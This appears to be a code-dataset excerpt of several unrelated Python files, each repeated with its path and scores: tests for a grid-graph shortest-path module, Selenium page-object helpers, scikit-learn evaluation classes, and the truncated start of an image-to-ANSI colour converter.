self.havok.add_path(((13, 38), Direction.SOUTH),
((13, 37), Direction.NORTH), 1)
self.havok.add_unknown_paths({(13, 37): [(Direction.SOUTH, -2)]})
self.havok.add_unknown_paths({(16, 39): [(Direction.NORTH, -2)]})
def test_go_direction(self):
self.assertTrue(self.havok.go_direction((13, 37)))
self.assertFalse(self.havok.go_direction((15, 37)))
def test_get_next_node(self):
self.assertEqual(
self.havok.get_next_node((15, 37)), [((15, 37), Direction.NORTH),
((15, 39), Direction.EAST)])
self.assertEqual(
self.havok.get_next_node((15, 39)), [((15, 39), Direction.EAST)])
def test_get_direction(self):
self.assertEqual(self.havok.get_direction((13, 37)), Direction.SOUTH)
class ExploringNodes(unittest.TestCase):
def setUp(self):
self.nugget = Planet()
self.nugget.add_path(((0, 0), Direction.NORTH),
((0, 1), Direction.SOUTH), 1)
# 0,1 all known
self.nugget.add_path(((0, 1), Direction.NORTH),
((1, 0), Direction.SOUTH), 1)
self.nugget.add_path(((0, 1), Direction.EAST),
((1, 1), Direction.SOUTH), 1)
self.nugget.add_path(((0, 1), Direction.WEST),
((1, 1), Direction.SOUTH), 1)
def test_next_node(self):
self.assertFalse(self.nugget.go_direction((0, 0)))
self.assertNotEqual(
self.nugget.get_next_node((0, 0)), [((0, 0), Direction.NORTH)])
if __name__ == "__main__":
unittest.main() | src/planettest.py |
import unittest
from planet import *
class ExampleTestPlanet(unittest.TestCase):
def setUp(self):
# set your data structure
self.havok = Planet()
self.havok.add_path(((15, 37), Direction.NORTH),
((15, 39), Direction.SOUTH), 1)
# loop
self.havok.add_path(((15, 39), Direction.NORTH),
((15, 39), Direction.WEST), 1)
self.havok.add_path(((15, 39), Direction.EAST),
((16, 39), Direction.WEST), 1)
self.havok.add_path(((15, 37), Direction.WEST),
((14, 39), Direction.SOUTH), 1)
self.havok.add_path(((14, 39), Direction.WEST),
((13, 38), Direction.NORTH), 1)
self.havok.add_path(((13, 38), Direction.SOUTH),
((13, 37), Direction.NORTH), 1)
# blocked paths
self.havok.add_path(((15, 37), Direction.SOUTH),
((15, 37), Direction.SOUTH), -1)
self.havok.add_path(((16, 39), Direction.NORTH),
((16, 39), Direction.NORTH), -1)
self.havok.add_path(((17, 38), Direction.SOUTH),
((17, 37), Direction.NORTH), 1)
def test_empty_planet(self):
self.assertIsNotNone(self.havok.get_paths())
self.assertNotEqual(self.havok.get_paths(), {})
def test_target_not_reachable(self):
self.assertIsNone(self.havok.shortest_path((13, 37), (20, 38)))
self.assertIsNone(self.havok.shortest_path((13, 37), (17, 38)))
class shortestPathTestPlanet(unittest.TestCase):
def setUp(self):
# set your data structure
self.havok = Planet()
self.havok.add_path(((15, 37), Direction.NORTH),
((15, 39), Direction.SOUTH), 1)
self.havok.add_path(((15, 37), Direction.EAST),
((17, 37), Direction.WEST), 1)
# loop
self.havok.add_path(((15, 39), Direction.NORTH),
((15, 39), Direction.WEST), 1)
self.havok.add_path(((15, 39), Direction.EAST),
((16, 39), Direction.WEST), 1)
self.havok.add_path(((15, 37), Direction.WEST),
((14, 39), Direction.SOUTH), 1)
self.havok.add_path(((14, 39), Direction.WEST),
((13, 38), Direction.NORTH), 1)
self.havok.add_path(((13, 38), Direction.SOUTH),
((13, 37), Direction.NORTH), 1)
self.havok.add_path(((17, 38), Direction.SOUTH),
((17, 37), Direction.NORTH), 1)
# changed this weight to make dijkstra predictable
self.havok.add_path(((17, 38), Direction.EAST),
((17, 37), Direction.EAST), 2)
self.havok.add_path(((16, 39), Direction.EAST),
((17, 38), Direction.NORTH), 1)
self.havok.add_path(((16, 39), Direction.SOUTH),
((17, 38), Direction.WEST), 1)
# blocked paths
self.havok.add_path(((15, 37), Direction.SOUTH),
((15, 37), Direction.SOUTH), -1)
self.havok.add_path(((16, 39), Direction.NORTH),
((16, 39), Direction.NORTH), -1)
def test_shortest_path(self):
print("HI")
print(self.havok.shortest_path((17, 38), (17, 38)))
self.assertEqual(
self.havok.shortest_path((13, 37), (17, 38)),
[((13, 37), Direction.NORTH), ((13, 38), Direction.NORTH),
((14, 39), Direction.SOUTH), ((15, 37), Direction.EAST),
((17, 37), Direction.NORTH)])
class ExploringTestPlanet(unittest.TestCase):
def setUp(self):
self.havok = Planet()
self.havok.add_path(((15, 37), Direction.NORTH),
((15, 39), Direction.SOUTH), 1)
self.havok.add_path(((15, 37), Direction.EAST),
((17, 37), Direction.WEST), 1)
self.havok.add_path(((15, 39), Direction.NORTH),
((15, 39), Direction.WEST), 1)
self.havok.add_path(((15, 39), Direction.EAST),
((16, 39), Direction.WEST), 1)
self.havok.add_path(((16, 39), Direction.EAST),
((17, 38), Direction.NORTH), 1)
self.havok.add_path(((16, 39), Direction.SOUTH),
((17, 38), Direction.WEST), 1)
self.havok.add_path(((17, 38), Direction.SOUTH),
((17, 37), Direction.NORTH), 1)
self.havok.add_path(((17, 38), Direction.EAST),
((17, 37), Direction.EAST), 1)
self.havok.add_path(((15, 37), Direction.WEST),
((14, 39), Direction.SOUTH), 1)
self.havok.add_path(((14, 39), Direction.WEST),
((13, 38), Direction.NORTH), 1)
self.havok.add_path(((13, 38), Direction.SOUTH),
((13, 37), Direction.NORTH), 1)
self.havok.add_unknown_paths({(13, 37): [(Direction.SOUTH, -2)]})
self.havok.add_unknown_paths({(16, 39): [(Direction.NORTH, -2)]})
def test_go_direction(self):
self.assertTrue(self.havok.go_direction((13, 37)))
self.assertFalse(self.havok.go_direction((15, 37)))
def test_get_next_node(self):
self.assertEqual(
self.havok.get_next_node((15, 37)), [((15, 37), Direction.NORTH),
((15, 39), Direction.EAST)])
self.assertEqual(
self.havok.get_next_node((15, 39)), [((15, 39), Direction.EAST)])
def test_get_direction(self):
self.assertEqual(self.havok.get_direction((13, 37)), Direction.SOUTH)
class ExploringNodes(unittest.TestCase):
def setUp(self):
self.nugget = Planet()
self.nugget.add_path(((0, 0), Direction.NORTH),
((0, 1), Direction.SOUTH), 1)
# 0,1 all known
self.nugget.add_path(((0, 1), Direction.NORTH),
((1, 0), Direction.SOUTH), 1)
self.nugget.add_path(((0, 1), Direction.EAST),
((1, 1), Direction.SOUTH), 1)
self.nugget.add_path(((0, 1), Direction.WEST),
((1, 1), Direction.SOUTH), 1)
def test_next_node(self):
self.assertFalse(self.nugget.go_direction((0, 0)))
self.assertNotEqual(
self.nugget.get_next_node((0, 0)), [((0, 0), Direction.NORTH)])
if __name__ == "__main__":
unittest.main() | 0.628293 | 0.457985 |
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.support.wait import WebDriverWait
import browser
import time
class PageObject:
XPATH_RADIO = '//div[@class="custom-tumbler" ' \
'and input[@type="radio" and @name="{}" and @value="{}"]]'
XPATH_CHECKBOX = \
'//div[@class="custom-tumbler" ' \
'and input[@type="checkbox" and @name="{}"]]'
def __init__(self, parent=None):
self.parent = parent or browser.driver
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
@staticmethod
def wait_until_moving(element, timeout=10):
class Move:
def __init__(self, elem):
self.element = elem
self.location = elem.location
def __call__(self, *args, **kwargs):
loc = element.location
res = self.location['x'] == loc['x'] \
and self.location['y'] == loc['y']
self.location = loc
return res
wait = WebDriverWait(browser.driver, timeout)
wait.until(Move(element))
@staticmethod
def wait_until_exists(element, timeout=10):
wait = WebDriverWait(browser.driver, timeout)
try:
wait.until(lambda driver: not element.is_displayed())
except StaleElementReferenceException:
pass
@staticmethod
def wait_element(page_object, attribute, timeout=10):
class El:
def __init__(self, page_object, attribute):
self.page_object = page_object
self.attribute = attribute
def __call__(self, *args, **kwargs):
try:
getattr(self.page_object, attribute)
return True
except NoSuchElementException:
return False
wait = WebDriverWait(browser.driver, timeout)
wait.until(El(page_object, attribute))
@staticmethod
def long_wait_element(page_object, attribute, timeout=40):
class El:
def __init__(self, page_object, attribute):
self.page_object = page_object
self.attribute = attribute
def __call__(self, *args, **kwargs):
try:
getattr(self.page_object, attribute)
return True
except (NoSuchElementException,
StaleElementReferenceException):
return False
wait = WebDriverWait(browser.driver, timeout)
wait.until(El(page_object, attribute))
@staticmethod
def click_element(page_object, *args):
# get the list of attributes passed to the method
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
"""1, 3, 4 are the number of passed to the method attributes
1 means that only class name and one property
were passed to the method
3 means that class name, two properties and index
of the element were passed to the method
4 means that class name, three properties and index
of the element were passed to the method
"""
if len(attributes) == 1:
getattr(page_object, attributes[0]).click()
elif len(attributes) == 3:
getattr(getattr(page_object, attributes[0])
[attributes[2]], attributes[1]).click()
elif len(attributes) == 4:
getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2]).click()
break
except (StaleElementReferenceException, NoSuchElementException,
WebDriverException):
time.sleep(0.5)
attempts += 1
@staticmethod
def find_element(page_object, *args):
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
if len(attributes) == 1:
return getattr(page_object, attributes[0])
elif len(attributes) == 3:
return getattr(getattr(page_object,
attributes[0])[attributes[2]],
attributes[1])
elif len(attributes) == 4:
return getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2])
break
except (StaleElementReferenceException, NoSuchElementException,
WebDriverException):
time.sleep(0.5)
attempts += 1
@staticmethod
def get_text(page_object, *args):
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
if len(attributes) == 1:
return getattr(page_object, attributes[0]).text
elif len(attributes) == 3:
return getattr(getattr(page_object,
attributes[0])[attributes[2]],
attributes[1]).text
elif len(attributes) == 4:
return getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2]).text
break
except (StaleElementReferenceException, NoSuchElementException):
time.sleep(0.5)
attempts += 1
@staticmethod
def get_lower_text(page_object, *args):
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
if len(attributes) == 1:
return getattr(page_object, attributes[0]).text.lower()
elif len(attributes) == 3:
return getattr(getattr(page_object,
attributes[0])[attributes[2]],
attributes[1]).text.lower()
elif len(attributes) == 4:
return getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2]).text.lower()
break
except (StaleElementReferenceException, NoSuchElementException):
time.sleep(0.5)
attempts += 1
class Popup(PageObject):
def __init__(self):
element = browser.driver.find_element_by_css_selector('div.modal')
PageObject.__init__(self, element)
time.sleep(0.5)
# PageObject.wait_until_moving(self.parent)
def wait_until_exists(self):
try:
PageObject.wait_until_exists(
browser.driver.
find_element_by_css_selector('div.modal-backdrop'))
except NoSuchElementException:
pass
# Check that element is displayed
@staticmethod
def wait_until_element_will_be_displayed(self, element):
try:
wait = WebDriverWait(browser.driver, 3)
wait.until(element.is_displayed())
except NoSuchElementException:
pass
@property
def close_cross(self):
return self.parent.find_element_by_css_selector('.close')
@property
def header(self):
return self.parent.find_element_by_css_selector('.modal-header > h3')
class ConfirmPopup(Popup):
TEXT = 'Settings were modified but not saved'
@property
def stay_on_page(self):
return self.parent.find_element_by_css_selector('.btn-return')
@property
def leave_page(self):
return self.parent.\
find_element_by_css_selector('.proceed-btn') | fuelweb_ui_test/pageobjects/base.py | from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.support.wait import WebDriverWait
import browser
import time
class PageObject:
XPATH_RADIO = '//div[@class="custom-tumbler" ' \
'and input[@type="radio" and @name="{}" and @value="{}"]]'
XPATH_CHECKBOX = \
'//div[@class="custom-tumbler" ' \
'and input[@type="checkbox" and @name="{}"]]'
def __init__(self, parent=None):
self.parent = parent or browser.driver
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
@staticmethod
def wait_until_moving(element, timeout=10):
class Move:
def __init__(self, elem):
self.element = elem
self.location = elem.location
def __call__(self, *args, **kwargs):
loc = element.location
res = self.location['x'] == loc['x'] \
and self.location['y'] == loc['y']
self.location = loc
return res
wait = WebDriverWait(browser.driver, timeout)
wait.until(Move(element))
@staticmethod
def wait_until_exists(element, timeout=10):
wait = WebDriverWait(browser.driver, timeout)
try:
wait.until(lambda driver: not element.is_displayed())
except StaleElementReferenceException:
pass
@staticmethod
def wait_element(page_object, attribute, timeout=10):
class El:
def __init__(self, page_object, attribute):
self.page_object = page_object
self.attribute = attribute
def __call__(self, *args, **kwargs):
try:
getattr(self.page_object, attribute)
return True
except NoSuchElementException:
return False
wait = WebDriverWait(browser.driver, timeout)
wait.until(El(page_object, attribute))
@staticmethod
def long_wait_element(page_object, attribute, timeout=40):
class El:
def __init__(self, page_object, attribute):
self.page_object = page_object
self.attribute = attribute
def __call__(self, *args, **kwargs):
try:
getattr(self.page_object, attribute)
return True
except (NoSuchElementException,
StaleElementReferenceException):
return False
wait = WebDriverWait(browser.driver, timeout)
wait.until(El(page_object, attribute))
@staticmethod
def click_element(page_object, *args):
# get the list of attributes passed to the method
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
"""1, 3, 4 are the number of passed to the method attributes
1 means that only class name and one property
were passed to the method
3 means that class name, two properties and index
of the element were passed to the method
4 means that class name, three properties and index
of the element were passed to the method
"""
if len(attributes) == 1:
getattr(page_object, attributes[0]).click()
elif len(attributes) == 3:
getattr(getattr(page_object, attributes[0])
[attributes[2]], attributes[1]).click()
elif len(attributes) == 4:
getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2]).click()
break
except (StaleElementReferenceException, NoSuchElementException,
WebDriverException):
time.sleep(0.5)
attempts += 1
@staticmethod
def find_element(page_object, *args):
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
if len(attributes) == 1:
return getattr(page_object, attributes[0])
elif len(attributes) == 3:
return getattr(getattr(page_object,
attributes[0])[attributes[2]],
attributes[1])
elif len(attributes) == 4:
return getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2])
break
except (StaleElementReferenceException, NoSuchElementException,
WebDriverException):
time.sleep(0.5)
attempts += 1
@staticmethod
def get_text(page_object, *args):
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
if len(attributes) == 1:
return getattr(page_object, attributes[0]).text
elif len(attributes) == 3:
return getattr(getattr(page_object,
attributes[0])[attributes[2]],
attributes[1]).text
elif len(attributes) == 4:
return getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2]).text
break
except (StaleElementReferenceException, NoSuchElementException):
time.sleep(0.5)
attempts += 1
@staticmethod
def get_lower_text(page_object, *args):
attributes = [attribute for attribute in args]
attempts = 0
while attempts < 5:
try:
if len(attributes) == 1:
return getattr(page_object, attributes[0]).text.lower()
elif len(attributes) == 3:
return getattr(getattr(page_object,
attributes[0])[attributes[2]],
attributes[1]).text.lower()
elif len(attributes) == 4:
return getattr(getattr(getattr(page_object,
attributes[0])[attributes[3]],
attributes[1]), attributes[2]).text.lower()
break
except (StaleElementReferenceException, NoSuchElementException):
time.sleep(0.5)
attempts += 1
class Popup(PageObject):
def __init__(self):
element = browser.driver.find_element_by_css_selector('div.modal')
PageObject.__init__(self, element)
time.sleep(0.5)
# PageObject.wait_until_moving(self.parent)
def wait_until_exists(self):
try:
PageObject.wait_until_exists(
browser.driver.
find_element_by_css_selector('div.modal-backdrop'))
except NoSuchElementException:
pass
# Check that element is displayed
@staticmethod
def wait_until_element_will_be_displayed(self, element):
try:
wait = WebDriverWait(browser.driver, 3)
wait.until(element.is_displayed())
except NoSuchElementException:
pass
@property
def close_cross(self):
return self.parent.find_element_by_css_selector('.close')
@property
def header(self):
return self.parent.find_element_by_css_selector('.modal-header > h3')
class ConfirmPopup(Popup):
TEXT = 'Settings were modified but not saved'
@property
def stay_on_page(self):
return self.parent.find_element_by_css_selector('.btn-return')
@property
def leave_page(self):
return self.parent.\
find_element_by_css_selector('.proceed-btn') | 0.534127 | 0.113506 |
import pickle
from itertools import cycle
from time import time
from tqdm.auto import tqdm
import shutil
from pathlib import Path
# Pandas, Numpy
import pandas as pd
import numpy as np
from numpy import interp
from matplotlib import pyplot as plt
pd.set_option("display.max_columns", None)
# Model evaluation
from sklearn.metrics import plot_confusion_matrix, roc_auc_score, auc, \
precision_recall_fscore_support, classification_report, roc_curve, plot_roc_curve
# Sklearn pipeline
from sklearn.base import TransformerMixin, BaseEstimator
from sklearn.pipeline import FeatureUnion
from sklearn.compose import ColumnTransformer
from sklearn import set_config
from sklearn.pipeline import Pipeline
set_config(display = 'diagram')
class PipelineLogger(object):
def __init__(self):
self.logs = {}
def log_start(self, key, message=''):
self.logs[key] = {}
self.logs[key]['start_time'] = time()
print(f':::{self.__class__.__name__} ~ {key}::: START ::: {message}')
return None
def log_finish(self, key, message=''):
self.logs[key]['finish_time'] = time()
self.logs[key]['duration'] = self.logs[key]['finish_time'] - self.logs[key]['start_time']
print(f':::{self.__class__.__name__} ~ {key}::: FINISH ::: Take {self.duration:.6f}(s)')
print(message)
class ExperimentBaseClassifier(BaseEstimator):
def evaluate(self, X_test, y_test):
print('Evaluating model')
print(classification_report(y_true=y_test, y_pred=self.predict(X_test)))
metrics = self.auc_report(X_test, y_test)
metrics['precision'], metrics['recall'], metrics['f1_score'], metrics['support'] = precision_recall_fscore_support(y_test, self.predict(X_test))
return metrics
def auc_report(self, X, y_true):
classes = self.classes_
y_pred_classes = self.predict_proba(X)
n_classes = len(classes)
lw = 2
for i in range(len(classes)):
print(f"""{classes[i]}: {roc_auc_score(y_true=(y_true==classes[i]).astype(int), y_score=y_pred_classes[:,i])}""")
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(y_true=(y_true==classes[i]).astype(int), y_score=y_pred_classes[:,i])
roc_auc[i] = auc(fpr[i], tpr[i])
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(len(classes))]))
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(len(classes)):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure()
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(classes[i], roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Some extension of Receiver operating characteristic to multi-class')
plt.legend(loc="lower right")
plt.show()
metrics = {
'macro_auc': roc_auc["macro"]
}
for i in range(n_classes):
metrics[f'auc_{classes[i]}'] = roc_auc[i]
return metrics
class BaseEnrichment(TransformerMixin, BaseEstimator):
def __init__(self, source_col, enrichment_df):
super().__init__()
self.source_col = source_col
self.enrichment_df = enrichment_df.set_index(self.source_col)
def fit(self, X, y=None):
return self
def transform(self, X):
X_ = X.join(self.enrichment_df, on=self.source_col, how='left')[self.enrichment_df.columns]
return X_ | pskit/base.py | import pickle
from itertools import cycle
from time import time
from tqdm.auto import tqdm
import shutil
from pathlib import Path
# Pandas, Numpy
import pandas as pd
import numpy as np
from numpy import interp
from matplotlib import pyplot as plt
pd.set_option("display.max_columns", None)
# Model evaluation
from sklearn.metrics import plot_confusion_matrix, roc_auc_score, auc, \
precision_recall_fscore_support, classification_report, roc_curve, plot_roc_curve
# Sklearn pipeline
from sklearn.base import TransformerMixin, BaseEstimator
from sklearn.pipeline import FeatureUnion
from sklearn.compose import ColumnTransformer
from sklearn import set_config
from sklearn.pipeline import Pipeline
set_config(display = 'diagram')
class PipelineLogger(object):
def __init__(self):
self.logs = {}
def log_start(self, key, message=''):
self.logs[key] = {}
self.logs[key]['start_time'] = time()
print(f':::{self.__class__.__name__} ~ {key}::: START ::: {message}')
return None
def log_finish(self, key, message=''):
self.logs[key]['finish_time'] = time()
self.logs[key]['duration'] = self.logs[key]['finish_time'] - self.logs[key]['start_time']
print(f':::{self.__class__.__name__} ~ {key}::: FINISH ::: Take {self.duration:.6f}(s)')
print(message)
class ExperimentBaseClassifier(BaseEstimator):
def evaluate(self, X_test, y_test):
print('Evaluating model')
print(classification_report(y_true=y_test, y_pred=self.predict(X_test)))
metrics = self.auc_report(X_test, y_test)
metrics['precision'], metrics['recall'], metrics['f1_score'], metrics['support'] = precision_recall_fscore_support(y_test, self.predict(X_test))
return metrics
def auc_report(self, X, y_true):
classes = self.classes_
y_pred_classes = self.predict_proba(X)
n_classes = len(classes)
lw = 2
for i in range(len(classes)):
print(f"""{classes[i]}: {roc_auc_score(y_true=(y_true==classes[i]).astype(int), y_score=y_pred_classes[:,i])}""")
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(y_true=(y_true==classes[i]).astype(int), y_score=y_pred_classes[:,i])
roc_auc[i] = auc(fpr[i], tpr[i])
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(len(classes))]))
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(len(classes)):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure()
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(classes[i], roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Some extension of Receiver operating characteristic to multi-class')
plt.legend(loc="lower right")
plt.show()
metrics = {
'macro_auc': roc_auc["macro"]
}
for i in range(n_classes):
metrics[f'auc_{classes[i]}'] = roc_auc[i]
return metrics
class BaseEnrichment(TransformerMixin, BaseEstimator):
def __init__(self, source_col, enrichment_df):
super().__init__()
self.source_col = source_col
self.enrichment_df = enrichment_df.set_index(self.source_col)
def fit(self, X, y=None):
return self
def transform(self, X):
X_ = X.join(self.enrichment_df, on=self.source_col, how='left')[self.enrichment_df.columns]
return X_ | 0.817866 | 0.225897 |
import os
import sys
import fcntl
import struct
import termios
import argparse
import itertools
from PIL import Image
from PIL.ImagePalette import ImagePalette
PALETTES = {
'tango': (
(0x00, 0x00, 0x00), (0xcc, 0x00, 0x00),
(0x4e, 0x9a, 0x06), (0xc4, 0xa0, 0x00),
(0x34, 0x65, 0xa4), (0x75, 0x50, 0x7b),
(0x06, 0x98, 0x9a), (0xd3, 0xd7, 0xcf),
(0x55, 0x57, 0x53), (0xef, 0x29, 0x29),
(0x8a, 0xe2, 0x34), (0xfc, 0xe9, 0x4f),
(0x72, 0x9f, 0xcf), (0xad, 0x7f, 0xa8),
(0x34, 0xe2, 0xe2), (0xee, 0xee, 0xec)
),
'linux': (
(0x00, 0x00, 0x00), (0xaa, 0x00, 0x00),
(0x00, 0xaa, 0x00), (0xaa, 0x55, 0x00),
(0x00, 0x00, 0xaa), (0xaa, 0x00, 0xaa),
(0x00, 0xaa, 0xaa), (0xaa, 0xaa, 0xaa),
(0x55, 0x55, 0x55), (0xff, 0x55, 0x55),
(0x55, 0xff, 0x55), (0xff, 0xff, 0x55),
(0x55, 0x55, 0xff), (0xff, 0x55, 0xff),
(0x55, 0xff, 0xff), (0xff, 0xff, 0xff)
),
'xterm': (
(0x00, 0x00, 0x00), (0xcd, 0x00, 0x00),
(0x00, 0xcd, 0x00), (0xcd, 0xcd, 0x00),
(0x00, 0x00, 0xee), (0xcd, 0x00, 0xcd),
(0x00, 0xcd, 0xcd), (0xe5, 0xe5, 0xe5),
(0x7f, 0x7f, 0x7f), (0xff, 0x00, 0x00),
(0x00, 0xff, 0x00), (0xff, 0xff, 0x00),
(0x5c, 0x5c, 0xff), (0xff, 0x00, 0xff),
(0x00, 0xff, 0xff), (0xff, 0xff, 0xff)
),
'rxvt': (
(0x00, 0x00, 0x00), (0xcd, 0x00, 0x00),
(0x00, 0xcd, 0x00), (0xcd, 0xcd, 0x00),
(0x00, 0x00, 0xcd), (0xcd, 0x00, 0xcd),
(0x00, 0xcd, 0xcd), (0xfa, 0xeb, 0xd7),
(0x40, 0x40, 0x40), (0xff, 0x00, 0x00),
(0x00, 0xff, 0x00), (0xff, 0xff, 0x00),
(0x00, 0x00, 0xff), (0xff, 0x00, 0xff),
(0x00, 0xff, 0xff), (0xff, 0xff, 0xff)
),
'solarized': (
(0x07, 0x36, 0x42), (0xdc, 0x32, 0x2f),
(0x85, 0x99, 0x00), (0xb5, 0x89, 0x00),
(0x26, 0x8b, 0xd2), (0xd3, 0x36, 0x82),
(0x2a, 0xa1, 0x98), (0xee, 0xe8, 0xd5),
(0x00, 0x2b, 0x36), (0xcb, 0x4b, 0x16),
(0x58, 0x6e, 0x75), (0x65, 0x7b, 0x83),
(0x83, 0x94, 0x96), (0x6c, 0x71, 0xc4),
(0x93, 0xa1, 0xa1), (0xfd, 0xf6, 0xe3)
)
}
ANSI_256 = tuple(tuple(int(x[y*2:(y+1)*2], 16) for y in range(3)) for x in (
'000000,00005f,000087,0000af,0000d7,0000ff,005f00,005f5f,'
'005f87,005faf,005fd7,005fff,008700,00875f,008787,0087af,'
'0087d7,0087ff,00af00,00af5f,00af87,00afaf,00afd7,00afff,'
'00d700,00d75f,00d787,00d7af,00d7d7,00d7ff,00ff00,00ff5f,'
'00ff87,00ffaf,00ffd7,00ffff,5f0000,5f005f,5f0087,5f00af,'
'5f00d7,5f00ff,5f5f00,5f5f5f,5f5f87,5f5faf,5f5fd7,5f5fff,'
'5f8700,5f875f,5f8787,5f87af,5f87d7,5f87ff,5faf00,5faf5f,'
'5faf87,5fafaf,5fafd7,5fafff,5fd700,5fd75f,5fd787,5fd7af,'
'5fd7d7,5fd7ff,5fff00,5fff5f,5fff87,5fffaf,5fffd7,5fffff,'
'870000,87005f,870087,8700af,8700d7,8700ff,875f00,875f5f,'
'875f87,875faf,875fd7,875fff,878700,87875f,878787,8787af,'
'8787d7,8787ff,87af00,87af5f,87af87,87afaf,87afd7,87afff,'
'87d700,87d75f,87d787,87d7af,87d7d7,87d7ff,87ff00,87ff5f,'
'87ff87,87ffaf,87ffd7,87ffff,af0000,af005f,af0087,af00af,'
'af00d7,af00ff,af5f00,af5f5f,af5f87,af5faf,af5fd7,af5fff,'
'af8700,af875f,af8787,af87af,af87d7,af87ff,afaf00,afaf5f,'
'afaf87,afafaf,afafd7,afafff,afd700,afd75f,afd787,afd7af,'
'afd7d7,afd7ff,afff00,afff5f,afff87,afffaf,afffd7,afffff,'
'd70000,d7005f,d70087,d700af,d700d7,d700ff,d75f00,d75f5f,'
'd75f87,d75faf,d75fd7,d75fff,d78700,d7875f,d78787,d787af,'
'd787d7,d787ff,d7af00,d7af5f,d7af87,d7afaf,d7afd7,d7afff,'
'd7d700,d7d75f,d7d787,d7d7af,d7d7d7,d7d7ff,d7ff00,d7ff5f,'
'd7ff87,d7ffaf,d7ffd7,d7ffff,ff0000,ff005f,ff0087,ff00af,'
'ff00d7,ff00ff,ff5f00,ff5f5f,ff5f87,ff5faf,ff5fd7,ff5fff,'
'ff8700,ff875f,ff8787,ff87af,ff87d7,ff87ff,ffaf00,ffaf5f,'
'ffaf87,ffafaf,ffafd7,ffafff,ffd700,ffd75f,ffd787,ffd7af,'
'ffd7d7,ffd7ff,ffff00,ffff5f,ffff87,ffffaf,ffffd7,ffffff,'
'080808,121212,1c1c1c,262626,303030,3a3a3a,444444,4e4e4e,'
'585858,626262,6c6c6c,767676,808080,8a8a8a,949494,9e9e9e,'
'a8a8a8,b2b2b2,bcbcbc,c6c6c6,d0d0d0,dadada,e4e4e4,eeeeee'
).split(','))
def _getdimensions():
call = fcntl.ioctl(1, termios.TIOCGWINSZ, "\000"*8)
height, width = struct.unpack("hhhh", call)[:2]
return width, height
def get_terminal_dimensions():
# Copied from PyPy.
try:
width, height = _getdimensions()
except (KeyboardInterrupt, SystemExit, MemoryError, GeneratorExit):
raise
except:
# FALLBACK
width = int(os.environ.get('COLUMNS', 80))
height = int(os.environ.get('LINES', 80))
else:
# XXX the windows getdimensions may be bogus, let's sanify a bit
if width < 40:
width = 80
height = 24
return width, height
class Image2ANSI:
DEFAULT_PALETTE = 'tango'
def __init__(self, mode, palette=None):
if mode == '4b':
self.colors = 16
self.pal = Image.new('P', (4, 4))
self.pal.putpalette(
tuple(itertools.chain.from_iterable(
PALETTES[palette or DEFAULT_PALETTE])) * 16
)
self.pal.load()
self.func_fg = lambda x: '\x1b[%d%dm' % (9 if x//8 else 3, x%8)
self.func_bg = lambda x: '\x1b[%d%dm' % (10 if x//8 else 4, x%8)
elif mode == '8b':
self.colors = 256
self.pal = Image.new('P', (16, 16))
self.pal.putpalette(
tuple(itertools.chain.from_iterable(
